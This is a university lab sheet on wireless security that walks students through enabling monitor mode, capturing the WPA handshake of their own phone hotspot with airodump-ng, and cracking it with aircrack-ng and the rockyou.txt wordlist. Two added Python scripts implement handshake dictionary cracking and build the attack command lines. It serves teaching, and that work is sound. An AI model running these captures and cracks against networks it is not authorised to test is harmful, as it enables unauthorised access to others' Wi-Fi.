Real World Practices for Cyber Security

WEEK 8 – TASK 8.2P

Pass Task. Release Date: 10 May, Due Date: 24 May, End Date: 31 May.

Learning Outcomes

In this task, you will learn about the security of wireless networks.

Instructions

An answer sheet template is available on OnTrack under `Resources'. Please download the answer sheet and fill it with your answers. To upload it to OnTrack, you need to convert the answer sheet document to PDF. MS Word includes built-in PDF conversion capability.

All questions and their sub-questions of this task must be attempted. If screenshots are required, please ensure that the text in the screenshots is readable.

Remember that troubleshooting technical problems is part of learning in this field. You must patiently work through issues and solve them. Tasks are not a step-by-step guide. You need to be in the driver's seat and learn concepts by doing, as you would when you start your future job (many times, even your future supervisor doesn't know the answer to the problems you face). After patient troubleshooting and research, if you need help:

Help is always available in SIT182. Please go to Discussions and ask your questions about this task in Task 8.2P. All students are encouraged to participate and help peers with their questions. Helping others is a great way to learn and think about aspects you may have overlooked. You can also seek help from tutors during online and face-to-face pracs. Please do not raise your questions through Teams, OnTrack, or Email.

References: In cyber security, our preferred referencing style is IEEE; however, you are allowed to use any Deakin approved referencing style in this unit. Please refer to unit site > Content > Referencing – Hints & Tips for more information.

SIT182 – Real World Practices for Cyber Security, ontrack.deakin.edu.au

Ensure that you review the cryptography concepts covered in Weeks 7 and 8 of the lectures. This task complements the theoretical concepts covered in Week 9's lecture (Wireless Network Security).
This task is covered in the Week 10 pracs (online and in person).

This trimester we have students across the world studying this unit online. As a result, some students have had difficulty purchasing the required wireless adapter for this task. In order to allow all students a fair chance to complete the unit, we are providing two options to complete this task (completing the task through either of the options has no impact on your final grade). Option 1 enhances your hands-on knowledge and Option 2 enhances your theoretical knowledge and advances your preparation for job interviews.

Option 1: If you have managed to purchase the ALFA wireless adapter (AWUS036NHA) or an equivalent monitor-mode capable adapter, then we suggest that you opt for Option 1.

Option 2: If you have not managed to purchase the adapter, please opt for Option 2.

Option 1

An overview of the WEP and WPA protocols is presented in the Week 9 lecture. You only need to know about the WEP and WPA protocols to the extent covered in lectures for your final exam. The following pages include some more detailed information about WEP and WPA/WPA2 for those interested.

Wired Equivalent Privacy (WEP) is the security protocol specified in the original IEEE 802.11 standard (and carried into 802.11b) for providing a WLAN with a level of security and privacy comparable to that of a wired network. WEP assumes all STAs share a secret key. WEP shared-key authentication, as illustrated above, is a challenge-response in which the STA proves that it possesses the shared key (i.e., that it is a legitimate device): the AP sends a random challenge and the STA returns it encrypted under the shared key.

WEP has many weaknesses, including: 1) key management is not specified in the WEP standard; 2) the Initialization Vector (IV) is too small (24 bits), so IVs repeat on a busy network within hours; 3) the Integrity Check Value (ICV) algorithm, CRC-32, is not appropriate, because it is linear and gives no protection against deliberate modification; 4) WEP's use of RC4 (a stream cipher) is weak, because the IV is simply prepended to the key and certain "weak" IVs leak key bytes; and 5) the authentication message can be forged, since an eavesdropper who sees a challenge and its encrypted response recovers a keystream that can be used to answer later challenges.

You will find many resources about the WEP protocol and how to break WEP online.
Here is a video describing WEP on YouTube: https://www.youtube.com/watch?v=Fr84Y1ur5dc

In this task, we will not focus on WEP. This is because very few routers use WEP (many recent router firmwares do not even support it). If you have an old WEP-capable router at home, you can follow the many tutorials that are available online and hack your own WEP network. Here is one example tutorial: https://diarium.usal.es/pmgallardo/2020/10/02/howto-crack-a-wep-password-using-aircrack-ng/

If you are aiming for a Distinction and looking for an idea to complete the `something awesome' task, you can set up your own WEP wireless network (with your own defined key) and hack the network (i.e., retrieve the password as an attacker who does not have the network key and wants to find it).

WEP to WPA/WPA2:

WPA was developed as a temporary solution to fix WEP while WPA2 was being developed. WPA was compatible with existing hardware that supported WEP. For example, WPA uses the Temporal Key Integrity Protocol (TKIP) for RC4 compatibility; however, every packet is encrypted with a unique per-packet key. TKIP uses a cryptographic mixing function to combine a temporal key, the TA (transmitter MAC address) and the sequence counter into the WEP seed (128 bits). The Pre-Shared Key (PSK), a.k.a. WPA-Personal, is similar to the WEP key in that every device shares it, but it is not used directly for encryption. Instead, the PSK is the starting point (the Pairwise Master Key) from which a different set of session keys is derived for each connected device. WPA extended the IV to 48 bits, which would take more than 100 years to repeat at typical packet rates. Moreover, the IV and key are mixed in a more complicated way than the mere concatenation used by WEP. Figure 1 gives a recap of WEP and WPA security:

Figure 1: WEP vs WPA

However, due to inherent weaknesses in RC4 and other flaws, attacks are still possible.

The attack against WPA: The PSK is a 256-bit value known to every device in the WLAN.
For WPA-Personal it is derived from the passphrase that is installed manually on each device (together with the network name). When using WPA or WPA2, at the beginning of the connection, the AP initiates a four-way handshake to derive the keys for this session. We provide a simplified summary of the four-way handshake in the following. The handshake must be completed, and a new temporary session key must be in place, before any encrypted data can actually be exchanged between the station and the AP.

The handshake works as follows:

• The AP and each station need an individual Pairwise Transient Key (PTK) to protect unicast communication between them. To derive a different PTK for each AP/station pair, a Pairwise Master Key (PMK), which is the PSK for WPA-Personal, is fed into a key-derivation function along with two random values: the ANonce, generated by the AP (the authenticator), and the SNonce, generated by the station (the supplicant, e.g. a laptop), plus the MAC addresses of both. Messages #1 and #2 in Figure 2 illustrate how the AP and station derive the same PTK without ever sending it over the air.

• To stop these handshake messages from being forged, messages #2 through #4 carry a Message Integrity Code (MIC). Each MIC is a keyed hash (HMAC) over the EAPOL-Key frame, computed with the Key Confirmation Key (KCK), which is the first 128 bits of the PTK. Please ignore the group key GTK for now.

If an attacker captures the handshake packets, it is possible to crack the WPA PSK if a weak shared key is used. For every candidate passphrase, the attacker computes the PMK, then the PTK using the nonces and MAC addresses obtained from the handshake, and then the MIC over the captured message. If the computed MIC is the same as the MIC captured from the handshake, the candidate was the correct passphrase.

Unlike WEP, where statistical methods can be used to speed up the cracking process, only plain brute-force techniques can be used against WPA/WPA2. This is because the key is not static, so collecting IVs, as when cracking WEP, does not speed up the attack. Brute-forcing the PSK can be very time consuming, so dictionary attacks are used.
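As an added example (not part of the task sheet, and not aircrack-ng's own code), the following Python re-implements the per-candidate check just described, which is exactly what aircrack-ng does with rockyou.txt in Step 16: derive the PMK from the candidate passphrase and SSID, expand it to the PTK with the captured nonces and MAC addresses, recompute the MIC over the captured EAPOL-Key message #2, and compare. Because no real capture is available offline, make_captured_handshake() simulates both sides of the handshake for the sheet's hotspot passphrase "baseball" and its example BSSID; the station MAC, the nonces and the simplified EAPOL-Key frame (no RSN IE in the key data) are constructed here and are not from the sheet.

```python
"""Dictionary attack against a captured WPA/WPA2 four-way handshake.

Added example, standard library only.  The "captured" handshake is built in
this file (constructed data) so the attack can be run offline.
"""
import hashlib
import hmac
import os
import struct

# EAPOL-Key layout (802.1X header then key descriptor): version, type, length,
# descriptor type, key info, key length, replay counter, nonce, IV, RSC, key
# ID, MIC, key data length, key data.  The 16-byte MIC starts at byte 81.
MIC_OFFSET = 81


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion",
                     min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce))."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):  # 4 x 160 bits covers 512 bits
        out += hmac.new(pmk, b"Pairwise key expansion" + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck: bytes, eapol_frame: bytes, key_version: int) -> bytes:
    """MIC over the EAPOL-Key frame with its own MIC field zeroed.
    key_version 1 = HMAC-MD5 (WPA/TKIP), 2 = HMAC-SHA1-128 (WPA2/CCMP)."""
    zeroed = eapol_frame[:MIC_OFFSET] + b"\x00" * 16 + eapol_frame[MIC_OFFSET + 16:]
    algo = hashlib.md5 if key_version == 1 else hashlib.sha1
    return hmac.new(kck, zeroed, algo).digest()[:16]


def check_candidate(passphrase, ssid, ap_mac, sta_mac, anonce, snonce, eapol_frame, key_version) -> bool:
    """One dictionary trial: passphrase -> PMK -> PTK -> KCK -> MIC, then compare."""
    pmk = pmk_from_passphrase(passphrase, ssid)
    kck = prf_512(pmk, ap_mac, sta_mac, anonce, snonce)[:16]
    captured_mic = eapol_frame[MIC_OFFSET:MIC_OFFSET + 16]
    return hmac.compare_digest(eapol_mic(kck, eapol_frame, key_version), captured_mic)


def crack(wordlist, **handshake):
    """Return the first passphrase in wordlist whose MIC matches, or None."""
    for word in wordlist:
        if check_candidate(word, **handshake):
            return word
    return None


def make_captured_handshake(passphrase, ssid, ap_mac, sta_mac, key_version=2):
    """Constructed stand-in for an airodump-ng capture: both AP and station are
    simulated here.  Only fields an eavesdropper would see are returned."""
    anonce, snonce = os.urandom(32), os.urandom(32)
    ptk = prf_512(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)
    key_info = 0x0100 | 0x0008 | key_version  # Key MIC | Pairwise | descriptor version
    body = (struct.pack(">BHHQ", 2, key_info, 0, 1)  # RSN descriptor, key info, key len, replay ctr
            + snonce + bytes(16) + bytes(8) + bytes(8) + bytes(16) + struct.pack(">H", 0))
    frame = struct.pack(">BBH", 2, 3, len(body)) + body  # EAPOL v2, type 3 = EAPOL-Key
    mic = eapol_mic(ptk[:16], frame, key_version)
    frame = frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + 16:]
    return dict(ssid=ssid, ap_mac=ap_mac, sta_mac=sta_mac, anonce=anonce,
                snonce=snonce, eapol_frame=frame, key_version=key_version)


if __name__ == "__main__":
    hs = make_captured_handshake("baseball", "Galaxy A31B641",
                                 bytes.fromhex("1E4E1605B641"),   # BSSID from the task sheet
                                 bytes.fromhex("0A1B2C3D4E5F"))   # constructed client MAC
    print(crack(["password", "123456", "baseball"], **hs))
```

The cost per candidate is dominated by the 4096-round PBKDF2 (two HMAC-SHA1 blocks), which is why the attack is only practical against passphrases that appear in a wordlist, and why a random 15-character key such as the one in Question 6D is out of reach even though the check itself is trivial.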
Dictionary attacks are not effective against strong keys (more than 12 characters with a combination of letters, numbers and symbols), but they can be very fast against keys that are plain words, telephone numbers or other non-random values. The bottom part of Figure 2 shows how each side generates the PTK by feeding the concatenation of the ANonce, SNonce and the sender/receiver MAC addresses through a pseudo-random function (PRF) keyed with the PMK.

Figure 2

There are many resources available about WPA online. Here is an interesting video summary comparing the different variants of WPA: https://www.youtube.com/watch?v=hLQ5rYNUwNg

Let's get our hands dirty and have a little fun!

You want to set up a WPA network and then use a Kali VM equipped with the ALFA wireless adapter (or any other "monitor-mode" capable wireless adapter that you may have purchased [1]) and extract the WPA key that the network uses.

Important: In Task 7.1P, you changed the repository for your Kali Linux VM. This was to allow you to install Snort from the Ubuntu repository. With the changed repository, you will not be able to complete this task. You have two options. A) Restore the Kali VM to the snapshot you took at the start of Task 7.1P, which you called "Before Snort Installation". For this, locate the snapshot for the Kali VM and click on "Restore".

Figure 3

B) If you did not take a snapshot of the VM at the start of Task 7.1P, you can re-download the Kali VM for VirtualBox from the links available in Task 1.4P and import it.

1. Ensure that you have installed the VirtualBox Extension Pack. This was required when you installed the Kali VM for the first time in Task 1.4P.
The Extension Pack is available from the following link and can be easily installed after downloading: https://www.virtualbox.org/wiki/Downloads

If you are using VMware or Parallels, you may need to check that your Kali VM is capable of using USB devices plugged into your host OS.

[1] Reminder: if you do not have the wireless adapter for any reason, you can complete this task through Option 2 (available later in this document).

2. Ensure that your Kali VM is connected to the Internet. Similar to previous tasks, click on Network and ensure that the settings look similar to Figure 4.

Figure 4

3. Log in to the Kali VM using kali as username and password. It is very likely that your ALFA adapter is not active yet, and the light on it is not blinking (if it is, you can skip this step). To fix this issue, we need to install the required firmware to make the ALFA adapter work with the provided Kali VM image. Run Terminal in the Kali VM and execute the following commands (see Figure 5):

sudo apt-get update
sudo apt-get install firmware-atheros

Figure 5

After installing the firmware, "Shut Down" your Kali VM (see Figure 6).

Figure 6

4. Plug your ALFA wireless adapter into your host OS using USB. Next, click on "Settings" for the Kali VM. Select "Ports" and under "USB" ensure "Enable USB Controller" is active and the "USB 2.0" option is selected. Click on the "Add USB" icon (as shown in Figure 4) and add your ALFA wireless adapter by selecting it from the list of devices shown. Your settings should be similar to Figure 6. After this, you can click OK and start the Kali VM. Note that it is very likely that your ALFA device will be recognised as either "Atheros" or "Realtek". If you do not see either of these appearing, unplug and re-plug the adapter a few times and notice what new device is recognised in the list: that device, whatever it may be recognised as, is your ALFA wireless device.
If you are using another device (i.e., you purchased a monitor-mode capable wireless device that is not the recommended ALFA wireless adapter), you will need to identify your device from the list in the same way.

Figure 7

Figure 8

Figure 9

5. Once you log in to the Kali VM, you should see the light on the adapter turned on. This indicates the adapter is now working. If the light on the adapter did not turn on, restart the Kali VM and unplug the adapter from the USB port of your host. Turn on the Kali VM and plug the adapter back into your host machine. Right-click on USB and select the ALFA wireless adapter to plug it into your Kali VM (see Figure 10).

Figure 10

This should resolve issues in most cases. However, if your issue persists, unplug the adapter, turn off the Kali VM and your host OS, and try again. Patiently troubleshoot a few times, and it will eventually work. Remember that troubleshooting technical problems is part of the learning process in units like SIT182.

6. Once you get the adapter up and running, you will be able to use it to browse nearby wireless networks in the Kali VM (see Figure 11). This confirms that your adapter is working.

Figure 11: Click on the network icon in the Kali VM top toolbar.

7. Download the "rockyou.txt" file using any of the following links inside your Kali VM and save it to the Desktop.

Dropbox: https://www.dropbox.com/s/rtiktsw1vm5nqb3/rockyou.txt
CloudStor: https://cloudstor.aarnet.edu.au/plus/s/fPj3e9TNzMpzI7U
Google Drive: https://drive.google.com/file/d/1rrcyOPEX6VU4u6Qgn4IorfSNUxxAlH04/view

8. Run the following command in the Terminal of the Kali VM. The output of running the command should be similar to Figure 12.

sudo apt install wireless-tools

Figure 12

9.
Run the following command in your Kali VM Terminal.

sudo iwconfig

Figure 13

Question 1: Referring to the output shown after running the command of Step 9, what is the meaning of the following values shown for the wlan0 interface:
"ESSID: off/any"
"Access Point: Not-Associated"
"Tx-Power=20 dBm"
You may need to answer this question by searching through resources online. Ensure that you include reference(s) for your answer.

10. Run the following command in your Kali VM Terminal.

sudo airmon-ng

Figure 14

Please note: In this case, the interface name is wlan0, but yours may be different.

11. Run the following command in your Kali VM Terminal to enable "monitor mode".

sudo airmon-ng start wlan0

Figure 15

Please note that you may need to adjust this interface name (i.e., wlan0). For example, your interface could be recognised as wlan1, etc.

As shown in the output messages, there are processes that we need to kill before we can enable monitor mode (typically NetworkManager and wpa_supplicant, which would otherwise keep resetting the interface to managed mode). Run the following command in your Kali VM Terminal:

sudo airmon-ng check kill

Figure 16

Let's double check that all processes interfering with monitor mode have been stopped.

sudo airmon-ng check

Figure 17

No errors are shown (blank output), so we are now ready to turn on monitor mode. Run the following command:

sudo airmon-ng start wlan0

Figure 18

You will notice that the wlan0 interface shown in Figure 15 has now changed to wlan0mon.

Note: your monitor-mode interface name may be different. Adjust the commands that use wlan0mon from here on accordingly.

Let's run the iwconfig command again and check our network settings:

sudo iwconfig

Figure 19

Compare the output shown in Figure 19 with Figure 13 (the Mode field should now read Monitor rather than Managed).

12. Time to view the wireless networks near you.
Run the following command in your Kali VM Terminal.

sudo airodump-ng wlan0mon

Figure 20

After a minute, press Ctrl + C to stop the listing. You are reminded that the above information will be different for different APs and wireless adapters, and the output shown in Figure 20 is only a sample.

Question 2:
A) Referring to the output shown in Figure 20, what is the meaning of the following values shown:
BSSID and ESSID
PWR
STATION
CH
ENC
#DATA
B) True or False? "A higher absolute value for PWR indicates that the ESSID is in closer proximity to your ALFA wireless adapter."
C) Include a screenshot of running the airodump-ng command as shown in Step 12. Ensure at least one BSSID and ESSID value is shown. If there are no wireless networks near you, turn on the hotspot on your phone and run the command.

Setting up your Target Network: Now that you have managed to configure the Kali VM and enable "monitor mode" for your ALFA wireless adapter, it is time to prepare the target network. For your target network, you will be using your phone and its Wi-Fi hotspot functionality. Change your hotspot Wi-Fi password to baseball.

Figure 21: Hotspot settings. The name of the wireless network for the iPhone hotspot is "Arash's iPhone"; the name of the wireless network for the Android hotspot is "Galaxy A31B641". Ensure the hotspot option is active.

To enable the hotspot on an iPhone, you can use the following guide: https://support.apple.com/en-au/HT204023
To enable the hotspot on an Android phone, you can use the following guide: https://www.androidauthority.com/mobile-hotspot-setup-631280/

Question 3: What is the name of the network for the hotspot you created using your mobile phone's hotspot functionality?

13. For this task sheet, we are targeting "Galaxy A31B641" as the target network Access Point (AP). In other words, this AP is the network we are targeting to hack and retrieve the password for. Let's run the airodump command again in the Kali VM Terminal.
This time ensure that you retrieve the information for the target network you created using your phone (i.e., the one you refer to in Question 3).

sudo airodump-ng wlan0mon

Figure 22

Please note that you will need to target the network you created using your phone hotspot. Hence, your results will be different for the above command, and the commands you execute from this point onwards need to be adjusted.

Question 4: Include a screenshot showing that you have run the command in Step 13, which includes the ESSID of the AP you created using your phone's hotspot functionality (i.e., the name you provide in Question 3 must be shown).

14. Start airodump-ng to collect the 4-way authentication handshake for the target Access Point (AP). The syntax for the command is as follows:

sudo airodump-ng -c "channel no." --bssid "AP MAC address" -w "path prefix for the capture files" "monitor mode interface"

• -c is the channel of the wireless network (locking to one channel is what lets you catch every handshake frame)
• --bssid restricts the capture to the target AP
• -w defines the filename prefix for the files that will contain the handshake

For instance, in this case, we are targeting "Galaxy A31B641" and the command is adjusted as follows:

sudo airodump-ng -c 6 --bssid 1E:4E:16:05:B6:41 -w Desktop/WPA wlan0mon

You are reminded once again that you need to adjust the parameters depending on the AP you are targeting and the values you see for your target AP.

Figure 23

Leave the capture running.

In Figure 23, there are currently no legitimate clients connected to the AP. As mentioned earlier, to attack a WPA network, we need to capture a handshake. For this, a legitimate client needs to connect to the target AP.
This will allow you (i.e., the attacker in this case) to capture the handshake.

You can connect to your phone's AP using any other device that you may have. Alternatively, you can connect to the target AP from your host OS (i.e., not the Kali VM). In this case, for instance, we join "Galaxy A31B641" from the host OS as we would join any other wireless network.

15. As the attacker, we were intercepting traffic between the client (our host OS) and the target AP using the ALFA wireless adapter in monitor mode with the command used in Step 14. This allowed us to capture the handshake.

Figure 24: the airodump-ng status line now shows "WPA handshake: 1E:4E:16:05:B6:41".

Please be reminded that the handshake you capture will have different values. Also, if after connecting to the AP the handshake was not shown, try to reconnect a few times: airodump-ng only sees the EAPOL messages of a fresh association, so a client that was already connected before the capture started will not produce a handshake until it reconnects.

Question 5: Include a screenshot that indicates you have run the command in Step 14, and you have captured the WPA handshake as shown in Figure 24.

16. The final step is to try to crack the key based on the collected handshake. To do so you must use a dictionary file. The default aircrack-ng installation contains a basic dictionary, but more complete and extensive dictionaries can also be used. The command you need to use has the following syntax:

sudo aircrack-ng -w "path to password list" -b "AP MAC address" "path to capture files*.cap"

• -w is the filename of the dictionary
• -b is the BSSID of the AP
• *.cap are the files that contain the handshake

We will use the "rockyou.txt" you downloaded in Step 7 as the dictionary file. Remember that you stored it on your Desktop. The BSSID of the AP refers to the BSSID of your target network.
The ".cap" files contain what you captured in Step 14. Remember that you are also storing the .cap files on the Desktop.

In our case, the command we use to run a dictionary attack against the "Galaxy A31B641" network is as follows:

sudo aircrack-ng -w Desktop/rockyou.txt -b 1E:4E:16:05:B6:41 Desktop/*.cap

You just managed to crack a WPA network!

Question 6:
A) Include a screenshot of the commands you used in Step 16.
B) Include a screenshot of the output you receive after executing the command in Step 16 (the screenshot should indicate that the key was found).
C) Why is a dictionary file (rockyou.txt) needed when attacking a WPA network?
D) If we had used a password such as "*&^%FASDnhu812", could we have cracked the password using the rockyou.txt dictionary file?
E) What is the difference between WPA and WPA2?

Congratulations! This was the last Pass task for SIT182. We hope you enjoyed it. There is so much more in wireless network security that you will learn about in your future units.

Option 2 [2]

Question 1: Put your researcher cap on and answer the following common interview questions related to Wireless Network Security. You are expected to find the answers to these questions and explain them in your own words. You are expected to list 2 references for each; Wikipedia and your lecture notes are not allowed. You may find the textbooks available in the "Reading List" of the SIT182 unit site (available under "Content") useful when finding the answers to these questions. -10% of the specified word count and up to +50% of it is OK, i.e., don't worry about the word limit and focus on learning!

A) What is a Rogue Access Point (AP)? Briefly explain 2 different approaches to detect a rogue AP. In your answer ensure that you discuss whether you think a rogue AP is a security vulnerability and how an attacker may exploit a rogue AP. (300 words)

B) What is Wi-Fi Protected Setup (WPS)? Which of the following WPS methods is vulnerable?
Push-button method, PIN method, Piconet method, NFC method. (200 words)

C) Which one is more secure: WEP, WPA, or WPA2? Explain 2 vulnerabilities of WPA that led to the development of WPA2. (300 words)

D) Discuss how MAC address filtering may be used to secure a wireless network against threats. (200 words)

E) Briefly discuss what an Evil Twin AP attack is. (200 words)

F) Near Field Communication (NFC) is used for contactless payment systems. List and briefly explain 3 different vulnerabilities of NFC. (200 words)

[2] You are not required to know the extra theoretical content you learn about in Option 2 for the final exam.

Congratulations! This was the last Pass task for SIT182. We hope you enjoyed learning more about wireless network security and feel more confident about your future interviews. There is so much more in wireless network security that you will learn about in your future units. Don't forget about submitting your learning portfolio after completing all the tasks. There will be a Pass task available on OnTrack providing you with more information on how to do this.
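As an added example for Option 1 (not part of the task sheet, and not aircrack-ng's own code), the Python below turns the airodump-ng survey of Step 12 into the targeted capture of Step 14 and the crack of Step 16: it parses the CSV that airodump-ng -w writes alongside the .cap file, picks the AP by ESSID, checks that the AP actually uses WPA/WPA2 (a handshake attack is meaningless against an open or WEP network), lists the associated stations (the handshake only appears once a client connects), and builds the two command lines with the sheet's parameters. The CSV column layout is assumed from airodump-ng's usual <prefix>-01.csv output, and SAMPLE_CSV is constructed to resemble Figures 20 and 22 for the sheet's "Galaxy A31B641" hotspot; the other networks, timestamps and the client MAC are made up. The power ordering also answers Question 2B: PWR is a signal level in dBm, so -38 dBm is a closer AP than -83 dBm and a higher absolute value means a weaker signal.

```python
"""Choose the airodump-ng target and build the capture/crack command lines.

Added example, standard library only.  SAMPLE_CSV is constructed data in the
layout airodump-ng -w writes to <prefix>-01.csv (assumed; check your file).
"""
import csv
import io
from typing import Dict, List, Tuple

SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
1E:4E:16:05:B6:41, 2021-05-20 10:00:01, 2021-05-20 10:02:10,  6,  65, WPA2, CCMP, PSK, -38,  140,    0,   0.  0.  0.  0,  14, Galaxy A31B641,
AA:BB:CC:DD:EE:01, 2021-05-20 10:00:03, 2021-05-20 10:02:09, 11, 130, WPA2, CCMP, PSK, -71,   96,    0,   0.  0.  0.  0,   9, HomeWiFi1,
AA:BB:CC:DD:EE:02, 2021-05-20 10:00:05, 2021-05-20 10:02:08,  1,  54, OPN,  ,  , -83,   40,    0,   0.  0.  0.  0,   7, CafeNet,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
0A:1B:2C:3D:4E:5F, 2021-05-20 10:01:30, 2021-05-20 10:02:10, -40,       25, 1E:4E:16:05:B6:41, Galaxy A31B641
"""

Row = Dict[str, str]


def parse_airodump_csv(text: str) -> Tuple[List[Row], List[Row]]:
    """Split the file into its AP table and station table and parse both."""
    ap_lines: List[str] = []
    sta_lines: List[str] = []
    current = ap_lines
    for line in text.splitlines():
        if line.startswith("Station MAC"):
            current = sta_lines
        if line.strip():
            current.append(line)

    def table(lines: List[str]) -> List[Row]:
        reader = csv.DictReader(io.StringIO("\n".join(lines)), skipinitialspace=True)
        return [{k.strip(): (v or "").strip() for k, v in row.items() if k} for row in reader]

    return table(ap_lines), table(sta_lines)


def select_target(aps: List[Row], essid: str) -> Dict[str, object]:
    """Find the AP to attack by its network name (the Question 3 hotspot)."""
    for ap in aps:
        if ap["ESSID"] == essid:
            return {"bssid": ap["BSSID"], "channel": int(ap["channel"]),
                    "privacy": ap["Privacy"], "power_dbm": int(ap["Power"])}
    raise LookupError(f"ESSID {essid!r} not seen; is the hotspot on and in range?")


def strongest_first(aps: List[Row]) -> List[str]:
    """ESSIDs ordered by signal: PWR is dBm, so the least negative value is
    the strongest (closest) AP, i.e. a higher absolute PWR means further away."""
    return [ap["ESSID"] for ap in sorted(aps, key=lambda ap: int(ap["Power"]), reverse=True)]


def clients_of(stations: List[Row], bssid: str) -> List[str]:
    """Stations associated with the AP; without one, no handshake will appear."""
    return [s["Station MAC"] for s in stations if s["BSSID"] == bssid]


def capture_command(target: Dict[str, object], prefix: str, iface: str) -> List[str]:
    """Step 14: lock to the AP's channel and BSSID and write <prefix>-01.cap."""
    if not str(target["privacy"]).startswith("WPA"):
        raise ValueError(f"{target['bssid']} uses {target['privacy']}; no WPA handshake to capture")
    return ["sudo", "airodump-ng", "-c", str(target["channel"]),
            "--bssid", str(target["bssid"]), "-w", prefix, iface]


def crack_command(target: Dict[str, object], wordlist: str, prefix: str) -> List[str]:
    """Step 16: dictionary attack on the capture airodump-ng numbered -01."""
    return ["sudo", "aircrack-ng", "-w", wordlist, "-b", str(target["bssid"]), f"{prefix}-01.cap"]


if __name__ == "__main__":
    aps, stations = parse_airodump_csv(SAMPLE_CSV)
    target = select_target(aps, "Galaxy A31B641")
    print("by signal:", strongest_first(aps))
    print("clients:", clients_of(stations, str(target["bssid"])))
    print(" ".join(capture_command(target, "Desktop/WPA", "wlan0mon")))
    print(" ".join(crack_command(target, "Desktop/rockyou.txt", "Desktop/WPA")))
```

On a real run, read the file with open("Desktop/WPA-01.csv").read() in place of SAMPLE_CSV, and print the command lists with subprocess or shlex rather than copying them by hand; the channel and BSSID then always come from what the adapter actually saw, which is where most mistakes in Step 14 happen.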
